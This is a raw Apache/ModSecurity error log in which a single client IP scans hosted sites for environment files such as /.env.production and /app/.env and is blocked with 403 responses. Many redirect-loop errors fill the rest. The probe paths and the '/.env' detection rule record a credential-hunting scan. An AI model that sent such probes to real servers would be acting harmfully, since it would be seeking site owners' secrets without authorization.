[Mon May 11 23:11:11.813632 2026] [security2:error] [pid 1606352:tid 1606434] [client 185.213.175.72:34676] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "sitebuilder.totalcloud.fr"] [uri "/.env.production"] [unique_id "agJF73o_DFxNSZVmaX3etgAAAM8"]
[Mon May 11 23:11:11.813729 2026] [security2:error] [pid 1630927:tid 1630935] [client 185.213.175.72:34790] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "sitebuilder.totalcloud.fr"] [uri "/app/.env"] [unique_id "agJF72iGYYhUwDaJINmbPAAAAUU"]
[Mon May 11 23:11:11.813896 2026] [security2:error] [pid 1630927:tid 1630935] [client 185.213.175.72:34790] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "sitebuilder.totalcloud.fr"] [uri "/app/.env"] [unique_id "agJF72iGYYhUwDaJINmbPAAAAUU"]
[Mon May 11 23:11:11.813937 2026] [security2:error] [pid 1606352:tid 1606434] [client 185.213.175.72:34676] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "sitebuilder.totalcloud.fr"] [uri "/.env.production"] [unique_id "agJF73o_DFxNSZVmaX3etgAAAM8"]
[Mon May 11 23:11:11.814001 2026] [core:error] [pid 1630927:tid 1630934] [client 185.213.175.72:34704] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:11.814164 2026] [security2:error] [pid 1630927:tid 1630934] [client 185.213.175.72:34704] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "sitebuilder.totalcloud.fr"] [uri "/index.php"] [unique_id "agJF72iGYYhUwDaJINmbOgAAAUQ"]
[Mon May 11 23:11:11.814326 2026] [core:error] [pid 1588898:tid 1588904] [client 185.213.175.72:34850] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:11.814892 2026] [core:error] [pid 1588898:tid 1588904] [client 185.213.175.72:34850] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:11.815198 2026] [core:error] [pid 1605480:tid 1605537] [client 185.213.175.72:34682] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:11.815306 2026] [security2:error] [pid 1590352:tid 1590410] [client 185.213.175.72:34752] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "sitebuilder.totalcloud.fr"] [uri "/index.php"] [unique_id "agJF761q0G_aXAqWauQIzQAAAJI"]
[Mon May 11 23:11:11.815324 2026] [core:error] [pid 1590352:tid 1590403] [client 185.213.175.72:34788] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:11.815405 2026] [core:error] [pid 1588898:tid 1588917] [client 185.213.175.72:34576] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:11.815422 2026] [core:error] [pid 1588898:tid 1588917] [client 185.213.175.72:34576] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:11.815541 2026] [core:error] [pid 1630927:tid 1630935] [client 185.213.175.72:34790] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:11.815945 2026] [core:error] [pid 1590352:tid 1590399] [client 185.213.175.72:34604] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:11.815960 2026] [core:error] [pid 1590352:tid 1590399] [client 185.213.175.72:34604] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:11.816033 2026] [core:error] [pid 1588898:tid 1588912] [client 185.213.175.72:34692] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:11.816272 2026] [core:error] [pid 1606352:tid 1606424] [client 185.213.175.72:34628] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:11.816403 2026] [core:error] [pid 1606352:tid 1606424] [client 185.213.175.72:34628] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:11.816415 2026] [core:error] [pid 1588898:tid 1588902] [client 185.213.175.72:34794] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:11.816549 2026] [security2:error] [pid 1630927:tid 1630935] [client 185.213.175.72:34790] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "sitebuilder.totalcloud.fr"] [uri "/index.php"] [unique_id "agJF72iGYYhUwDaJINmbPAAAAUU"]
[Mon May 11 23:11:11.816817 2026] [security2:error] [pid 1605480:tid 1605537] [client 185.213.175.72:34682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "sitebuilder.totalcloud.fr"] [uri "/index.php"] [unique_id "agJF7x2Cvzd_nyNfUm8NZgAAAQ8"]
[Mon May 11 23:11:11.817025 2026] [security2:error] [pid 1588898:tid 1588912] [client 185.213.175.72:34692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "sitebuilder.totalcloud.fr"] [uri "/index.php"] [unique_id "agJF76FW67LJTsgN3jQaQgAAAA0"]
[Mon May 11 23:11:11.817120 2026] [core:error] [pid 1606352:tid 1606419] [client 185.213.175.72:34592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:11.817134 2026] [core:error] [pid 1606352:tid 1606419] [client 185.213.175.72:34592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:11.817145 2026] [security2:error] [pid 1588898:tid 1588902] [client 185.213.175.72:34794] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "sitebuilder.totalcloud.fr"] [uri "/index.php"] [unique_id "agJF76FW67LJTsgN3jQaPwAAAAM"]
[Mon May 11 23:11:11.817227 2026] [security2:error] [pid 1588898:tid 1589210] [client 185.213.175.72:34660] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "sitebuilder.totalcloud.fr"] [uri "/.env.example"] [unique_id "agJF76FW67LJTsgN3jQaQAAAABU"]
[Mon May 11 23:11:11.817394 2026] [security2:error] [pid 1588898:tid 1589210] [client 185.213.175.72:34660] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "sitebuilder.totalcloud.fr"] [uri "/.env.example"] [unique_id "agJF76FW67LJTsgN3jQaQAAAABU"]
[Mon May 11 23:11:11.817495 2026] [core:error] [pid 1605480:tid 1605546] [client 185.213.175.72:34736] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:11.817824 2026] [core:error] [pid 1606352:tid 1606434] [client 185.213.175.72:34676] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:11.817965 2026] [security2:error] [pid 1590352:tid 1590403] [client 185.213.175.72:34788] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "sitebuilder.totalcloud.fr"] [uri "/index.php"] [unique_id "agJF761q0G_aXAqWauQIzgAAAIs"]
[Mon May 11 23:11:11.817976 2026] [core:error] [pid 1601130:tid 1601155] [client 185.213.175.72:34616] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:11.817995 2026] [core:error] [pid 1601130:tid 1601155] [client 185.213.175.72:34616] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:11.818640 2026] [core:error] [pid 1630927:tid 1630949] [client 185.213.175.72:34834] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:11.818659 2026] [core:error] [pid 1630927:tid 1630949] [client 185.213.175.72:34834] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:11.819201 2026] [security2:error] [pid 1605480:tid 1605546] [client 185.213.175.72:34736] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "sitebuilder.totalcloud.fr"] [uri "/index.php"] [unique_id "agJF7x2Cvzd_nyNfUm8NaAAAARg"]
[Mon May 11 23:11:11.819372 2026] [security2:error] [pid 1606352:tid 1606434] [client 185.213.175.72:34676] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "sitebuilder.totalcloud.fr"] [uri "/index.php"] [unique_id "agJF73o_DFxNSZVmaX3etgAAAM8"]
[Mon May 11 23:11:11.821370 2026] [core:error] [pid 1588898:tid 1589210] [client 185.213.175.72:34660] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:11.822700 2026] [security2:error] [pid 1588898:tid 1589210] [client 185.213.175.72:34660] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "sitebuilder.totalcloud.fr"] [uri "/index.php"] [unique_id "agJF76FW67LJTsgN3jQaQAAAABU"]
[Mon May 11 23:11:11.842897 2026] [core:error] [pid 1630927:tid 1630947] [client 185.213.175.72:34624] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:11.842915 2026] [core:error] [pid 1630927:tid 1630947] [client 185.213.175.72:34624] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:11.937388 2026] [security2:error] [pid 1606352:tid 1606435] [client 2.57.23.215:44473] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJF73o_DFxNSZVmaX3eugAAANA"], referer: https://www.piregwan-genesis.com/
[Mon May 11 23:11:15.144760 2026] [core:error] [pid 1605480:tid 1605541] [client 185.213.175.72:35092] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:15.144796 2026] [core:error] [pid 1605480:tid 1605541] [client 185.213.175.72:35092] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:16.278433 2026] [core:error] [pid 1605480:tid 1605538] [client 185.213.175.72:34962] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:16.278458 2026] [core:error] [pid 1605480:tid 1605538] [client 185.213.175.72:34962] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:16.281942 2026] [core:error] [pid 1590352:tid 1590416] [client 185.213.175.72:34978] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:16.281966 2026] [core:error] [pid 1590352:tid 1590416] [client 185.213.175.72:34978] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:16.281967 2026] [core:error] [pid 1588898:tid 1590048] [client 185.213.175.72:34914] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:16.281986 2026] [core:error] [pid 1588898:tid 1590048] [client 185.213.175.72:34914] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:16.282343 2026] [core:error] [pid 1588898:tid 1588901] [client 185.213.175.72:34998] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:16.282362 2026] [core:error] [pid 1588898:tid 1588901] [client 185.213.175.72:34998] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:16.282356 2026] [core:error] [pid 1590352:tid 1590404] [client 185.213.175.72:35024] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:16.282376 2026] [core:error] [pid 1590352:tid 1590404] [client 185.213.175.72:35024] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:16.282809 2026] [core:error] [pid 1606352:tid 1606423] [client 185.213.175.72:35034] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:16.282825 2026] [core:error] [pid 1606352:tid 1606423] [client 185.213.175.72:35034] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:16.283220 2026] [core:error] [pid 1601130:tid 1601159] [client 185.213.175.72:34992] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:16.283250 2026] [core:error] [pid 1601130:tid 1601159] [client 185.213.175.72:34992] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:16.283664 2026] [core:error] [pid 1588898:tid 1588907] [client 185.213.175.72:35028] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:16.283680 2026] [core:error] [pid 1588898:tid 1588907] [client 185.213.175.72:35028] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:16.284164 2026] [core:error] [pid 1630927:tid 1630938] [client 185.213.175.72:35040] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:16.284186 2026] [core:error] [pid 1630927:tid 1630938] [client 185.213.175.72:35040] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:16.285353 2026] [core:error] [pid 1590352:tid 1590405] [client 185.213.175.72:35136] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:16.285373 2026] [core:error] [pid 1590352:tid 1590405] [client 185.213.175.72:35136] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:16.285684 2026] [core:error] [pid 1601130:tid 1601174] [client 185.213.175.72:35064] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:16.285701 2026] [core:error] [pid 1601130:tid 1601174] [client 185.213.175.72:35064] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:16.285872 2026] [core:error] [pid 1605480:tid 1605542] [client 185.213.175.72:35138] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:16.285893 2026] [core:error] [pid 1605480:tid 1605542] [client 185.213.175.72:35138] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:16.286193 2026] [core:error] [pid 1601130:tid 1601151] [client 185.213.175.72:34930] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:16.286213 2026] [core:error] [pid 1601130:tid 1601151] [client 185.213.175.72:34930] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:16.286343 2026] [core:error] [pid 1605480:tid 1605545] [client 185.213.175.72:35080] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:16.286359 2026] [core:error] [pid 1605480:tid 1605545] [client 185.213.175.72:35080] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:16.286655 2026] [core:error] [pid 1601130:tid 1601157] [client 185.213.175.72:35048] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:16.286672 2026] [core:error] [pid 1601130:tid 1601157] [client 185.213.175.72:35048] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:16.284847 2026] [core:error] [pid 1630927:tid 1630954] [client 185.213.175.72:35130] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:16.287213 2026] [core:error] [pid 1630927:tid 1630954] [client 185.213.175.72:35130] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:16.287532 2026] [core:error] [pid 1590352:tid 1590411] [client 185.213.175.72:34904] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:16.287547 2026] [core:error] [pid 1590352:tid 1590411] [client 185.213.175.72:34904] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:16.287678 2026] [core:error] [pid 1605480:tid 1605536] [client 185.213.175.72:35016] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:16.287693 2026] [core:error] [pid 1605480:tid 1605536] [client 185.213.175.72:35016] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:16.287711 2026] [core:error] [pid 1588898:tid 1588921] [client 185.213.175.72:35114] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:16.287730 2026] [core:error] [pid 1588898:tid 1588921] [client 185.213.175.72:35114] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:16.287822 2026] [core:error] [pid 1630927:tid 1630939] [client 185.213.175.72:35134] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
